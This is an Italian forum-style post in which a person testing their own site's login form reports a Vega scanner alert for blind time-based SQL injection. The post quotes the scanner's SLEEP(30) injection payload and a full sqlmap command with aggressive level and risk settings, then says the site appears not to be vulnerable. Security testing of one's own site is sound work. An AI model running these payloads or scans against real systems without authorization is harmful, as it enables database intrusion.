Ho eseguito un test con penna sul nostro sito Web e Vega mi ha indicato una iniezione sql nel nostro modulo di accesso. Ho provato ad usare burpuite e sql map per testare l'iniezione. Comunque non sono andato da nessuna parte.
Ecco cosa dice vega.
SQL Injection
Classification
Input Validation Error
Resource
https://connect.website.com/customer/account/https:/connect.website.com/customer/account/loginPost
Parameter
form_key
Method
POST
Detection Type
Blind Timing Analysis Checks
Risk
High
REQUEST
POST /customer/account/https:/connect.website.com/customer/account/loginPost/ [form_key=1 AND SLEEP(30) -- login[username]=Joey login[password]=vega send=1 ]
Ecco il comando sqlmap che sto usando da burpsuite con l'aggiunta integrata in sqlmap.
sqlmap.py -u "https://connect.website.com:443/customer/account/loginPost/referer/aHR0cHM6Ly9jb25uZWN0LmNhcmxzdGFyZ3JvdXAuY29tL2N1c3RvbWVyL2FjY291bnQvaW5kZXgv/"
--data="form_key=7Nuz4k1gNhKeA8TI&login%5Busername%5D=i%40ia.com&login%5Bpassword%5D=Man012&send=1"
--method="PUT"
--cookie="__utma=127784223.1809202726.1518887522.1518887522.1518928782.2; __utmc=127784223; __utmz=127784223.1518887522.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); frontend=6t1etlnb7l1ts01hkdt5dgafu5; frontend_cid=TnFuGP6n3JvalznN; __utmb=127784223.3.10.1518928782; __utmt=1"
--user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
--referer="https://connect.website.com/customer/account/login/referer/aHR0cHM6Ly9jb25uZWN0LmNhcmxzdGFyZ3JvdXAuY29tL2N1c3RvbWVyL2FjY291bnQvaW5kZXgv/"
--delay=0 --timeout=30 --retries=0 --dbms="MySQL"
--os=Linux --level=3 --risk=3 --threads=1 --time-sec=15
-b --batch --answers="crack=N,dict=N"
Solo un aggiornamento riattivo la scansione Vega e ha trovato più iniezioni SQL ma in realtà su una pagina diversa. Stesso tipo l'analisi dei tempi ciechi. Sembra non essere vulnerabile in base ai miei test con Burpsuite, ma questo è un po 'sopra la mia testa.